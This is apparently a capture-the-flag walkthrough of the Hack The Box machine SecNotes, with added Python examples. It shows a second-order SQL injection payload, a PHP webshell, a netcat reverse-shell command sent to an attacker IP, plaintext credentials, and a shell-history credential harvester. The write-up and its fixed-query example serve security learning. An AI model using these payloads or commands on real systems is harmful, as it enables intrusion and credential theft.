hackthebox-secnotes (IIS-php)

1. Scanning

Port 445 being open means SMB logon may be possible; 8808 is HTTP.

C:\root> masscan -p1-65535,U:1-65535 10.10.10.97 --rate=1000 -e tun0

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-02-12 01:45:25 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 445/tcp on 10.10.10.97                                    
Discovered open port 8808/tcp on 10.10.10.97                                   
Discovered open port 80/tcp on 10.10.10.97                                     
rate:  0.00-kpps, 100.00% done, waiting -22-secs, found=3
^Z
[1]+  Stopped                 masscan -p1-65535,U:1-65535 10.10.10.97 --rate=1000 -e tun0
C:\root> nmap -A 10.10.10.97 -p445,8808,80
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-12 09:48 CST
Nmap scan report for secnotes.htb (10.10.10.97)
Host is up (0.35s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
445/tcp  open  microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (86%)
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h39m59s, deviation: 4h37m09s, median: -1s
| smb-os-discovery: 
|   OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: SECNOTES
|   NetBIOS computer name: SECNOTES\x00
|   Workgroup: HTB\x00
|_  System time: 2021-02-11T17:48:43-08:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-02-12T01:48:45
|_  start_date: N/A


2. Injection & SMB

Port 80 (the Secure Notes app; nmap's http-title shows the login page there, while 8808 only serves the default IIS page)
Register and log in. The app itself is unremarkable and nothing useful shows up.
Now register again, this time with an injection payload as the username: test' or 1=1-- -
Log in with that account and new things appear: other users' notes, including obvious SMB logon credentials. This is a second-order SQL injection: the username is stored verbatim at registration (that query is safe), then spliced unescaped into the query that fetches the logged-in user's notes, so `or 1=1` returns every user's notes. Add 10.10.10.97 secnotes.htb to the local /etc/hosts.
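The second-order injection described above, as an added example that is not part of the original write-up: a toy notes app on Python's sqlite3 whose registration and login are parameterised (the payload is stored, not executed), but whose note lookup concatenates the stored username, shown beside the fixed version. The schema, rows and note texts are constructed for the demo.

```python
import sqlite3

# Constructed toy schema and rows modelled on the page's description; not the
# real SecNotes database.
SEED_SQL = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT);
CREATE TABLE notes (id INTEGER PRIMARY KEY, username TEXT, title TEXT, body TEXT);
INSERT INTO notes (username, title, body) VALUES
  ('tyler', 'new-site', 'share creds: tyler / <password>'),
  ('tyler', 'todo',     'migrate the site to port 8808'),
  ('alice', 'shopping', 'milk, bread');
"""

PAYLOAD = "test' or 1=1-- -"   # the username the write-up registers with


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SEED_SQL)
    return conn


def register(conn, username, password):
    # Parameterised: the payload is NOT executed here, it is stored verbatim.
    # That is what makes the injection "second-order".
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                 (username, password))
    conn.commit()


def login(conn, username, password):
    # Also parameterised; returns the stored username on success.
    row = conn.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                       (username, password)).fetchone()
    return row[0] if row else None


def notes_for_vulnerable(conn, username):
    # BUG (deliberate, mirrors the box): the username read back from the
    # database is treated as trusted and spliced into SQL. With PAYLOAD the
    # query becomes
    #   ... WHERE username = 'test' or 1=1-- -'
    # and the dangling quote is swallowed by the -- comment.
    query = f"SELECT username, title FROM notes WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def notes_for_fixed(conn, username):
    # Fix: bind the value. Data read back from the database is still data.
    return conn.execute("SELECT username, title FROM notes WHERE username = ?",
                        (username,)).fetchall()


def run(fetch):
    """Register with the payload, log in, then list notes via `fetch`."""
    conn = setup_db()
    register(conn, PAYLOAD, "x")
    who = login(conn, PAYLOAD, "x")
    return fetch(conn, who)


if __name__ == "__main__":
    print("vulnerable:", run(notes_for_vulnerable))   # every user's notes leak
    print("fixed:     ", run(notes_for_fixed))        # []
```

The point of the exercise is the split between where the payload enters (registration, safe) and where it fires (the notes query, unsafe): a scanner that only fuzzes the registration form sees nothing, which is why this class of bug survives.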
Connect to the share with smbclient //secnotes.htb/new-site -U "tyler" and enter the password 92g!mA8BGjOirkL%OG*&

ls shows exactly the default IIS images the 8808 site serves, so this share is that site's webroot: whatever is uploaded here, the web page serves.
The usual IIS playbook is to upload asp/aspx, but neither executed. Uploading cmd.php with put cmd.php did work: requesting it with whoami prints the result.
Contents of cmd.php:

<?php echo shell_exec($_GET['cmd']); ?>

Next upload nc with put nc.exe and try to get a reverse shell.
Several attempts came back with nothing.
What finally worked was uploading the 64-bit build (nc64.exe) and triggering it with curl:

curl "http://10.10.10.97:8808/cmd.php?cmd=nc64.exe+-e+cmd.exe+10.10.14.15+443"
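The share-to-webroot check and the webshell call above, as an added Python helper that is not from the write-up. It confirms the mapping by uploading a random marker over SMB, fetching it over HTTP and deleting it again, and it builds the smbclient argv and the ?cmd= URL without going through a shell, because tyler's password contains %, !, * and &, and a bare & in the URL would truncate $_GET['cmd']. The share and URL constants are the write-up's; the probe itself only runs against a live target, the builders run anywhere.

```python
import os
import secrets
import subprocess
import tempfile
import urllib.error
import urllib.parse
import urllib.request

# Target details taken from the write-up; adjust for another box.
SHARE = "//secnotes.htb/new-site"
HTTP_BASE = "http://10.10.10.97:8808"


def smbclient_argv(share, user, password, command):
    # Build argv directly (no shell): the password has '%', '!', '*' and '&',
    # all of which a shell would mangle. smbclient reads -U user%password and
    # splits at the first '%', so a '%' inside the password is fine.
    return ["smbclient", share, "-U", f"{user}%{password}", "-c", command]


def webshell_url(base, cmd):
    # urlencode percent-encodes the command: a raw '&' would start a second
    # query parameter and cut $_GET['cmd'] short; spaces become '+', which is
    # exactly the form used in the curl line above.
    return base.rstrip("/") + "/cmd.php?" + urllib.parse.urlencode({"cmd": cmd})


def marker_name():
    # Random name so the probe never collides with (or overwrites) real files.
    return f"probe-{secrets.token_hex(4)}.txt"


def probe_share_is_webroot(share, user, password, http_base, timeout=10):
    """Upload a random marker over SMB, fetch it over HTTP, then delete it.
    Returns True when the bytes served match the bytes uploaded."""
    name, body = marker_name(), secrets.token_hex(16).encode()
    with tempfile.TemporaryDirectory() as d:
        local = os.path.join(d, name)
        with open(local, "wb") as f:
            f.write(body)
        subprocess.run(smbclient_argv(share, user, password, f"put {local} {name}"),
                       check=True)
    try:
        with urllib.request.urlopen(f"{http_base}/{name}", timeout=timeout) as r:
            served = r.read()
    except urllib.error.HTTPError:
        served = None          # e.g. 404: share is not (or not directly) the webroot
    finally:
        # Clean up regardless of outcome; don't fail the probe if the delete does.
        subprocess.run(smbclient_argv(share, user, password, f"del {name}"), check=False)
    return served == body


if __name__ == "__main__":
    import getpass
    pw = getpass.getpass("tyler's password: ")
    print("share is the webroot:", probe_share_is_webroot(SHARE, "tyler", pw, HTTP_BASE))
    print("whoami URL:", webshell_url(HTTP_BASE, "whoami"))
```

Using the marker file rather than cmd.php for the first check keeps the "is this the webroot?" question separate from the "does PHP execute here?" question; only once the first is answered is it worth trying handlers.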

3. Privilege escalation

The user's desktop holds bash, a Linux thing, which is odd on a Windows box.

Search the whole box for bash.exe:

where /R C:\ bash.exe

The second hit works.
bash.exe drops into a Windows Subsystem for Linux environment, so from here on it is ordinary Linux work. Spawn a tty: python -c 'import pty;pty.spawn("/bin/bash")'
List hidden files, find the shell history, and read it: cat .bash_history
It contains the administrator's credentials: administrator%u6!4ZwgwOM#^OBf#Nwnh. The % is smbclient's -U user%password separator, so the user is administrator and the password is u6!4ZwgwOM#^OBf#Nwnh.
Log in directly with psexec.py from the impacket package (https://github.com/SecureAuthCorp/impacket): psexec.py administrator@10.10.10.97
Done.
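Pulling credentials out of shell history, as an added example that is not part of the write-up: a small parser for smbclient invocations that recovers user and password from -U user%pass, -Uuser%pass and --user=user%pass, splitting at the first % as smbclient does (tyler's password itself contains a %). The history lines are constructed to resemble what the write-up found; they are not the box's real file. The same scan is useful defensively, run over ~/.bash_history on a fleet to find credentials that should never have been typed on a command line.

```python
import shlex

# Constructed sample history (not the real .bash_history from the box), using
# the credentials the write-up recovered plus one made-up --user= form.
SAMPLE_HISTORY = """\
ls -la
cd /mnt/c/Users/tyler
smbclient -U 'tyler%92g!mA8BGjOirkL%OG*&' //10.10.10.97/new-site
smbclient -U administrator%u6!4ZwgwOM#^OBf#Nwnh //127.0.0.1/c$
smbclient --user=svc%s3cr3t //127.0.0.1/share
smbclient -U tyler -L 127.0.0.1
exit
"""


def parse_smbclient_creds(line):
    """Return (user, password) when an smbclient line carries both, (user, None)
    when it only names a user, or None when the line is not smbclient at all."""
    try:
        argv = shlex.split(line)          # honours the quoting bash would apply
    except ValueError:                    # unbalanced quotes: skip the line
        return None
    if not argv or argv[0].rsplit("/", 1)[-1] != "smbclient":
        return None
    value = None
    for i, tok in enumerate(argv[1:], start=1):
        if tok in ("-U", "--user") and i + 1 < len(argv):
            value = argv[i + 1]
            break
        if tok.startswith("--user="):
            value = tok[len("--user="):]
            break
        if tok.startswith("-U") and len(tok) > 2:   # -Uuser%pass, no space
            value = tok[2:]
            break
    if value is None:
        return None
    # smbclient splits at the FIRST '%'; everything after it is the password,
    # so a '%' inside the password survives intact.
    user, sep, password = value.partition("%")
    return (user, password if sep else None)


def harvest(history_text):
    """All (user, password) pairs found in a history file's text."""
    found = []
    for line in history_text.splitlines():
        hit = parse_smbclient_creds(line)
        if hit and hit[1] is not None:
            found.append(hit)
    return found


if __name__ == "__main__":
    for user, pw in harvest(SAMPLE_HISTORY):
        print(f"{user}: {pw}")
```

Note what is deliberately not matched: -U tyler with no % yields no password (smbclient would have prompted for it, and the prompt answer never lands in history), which is precisely the habit that would have kept the administrator credential off this box.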
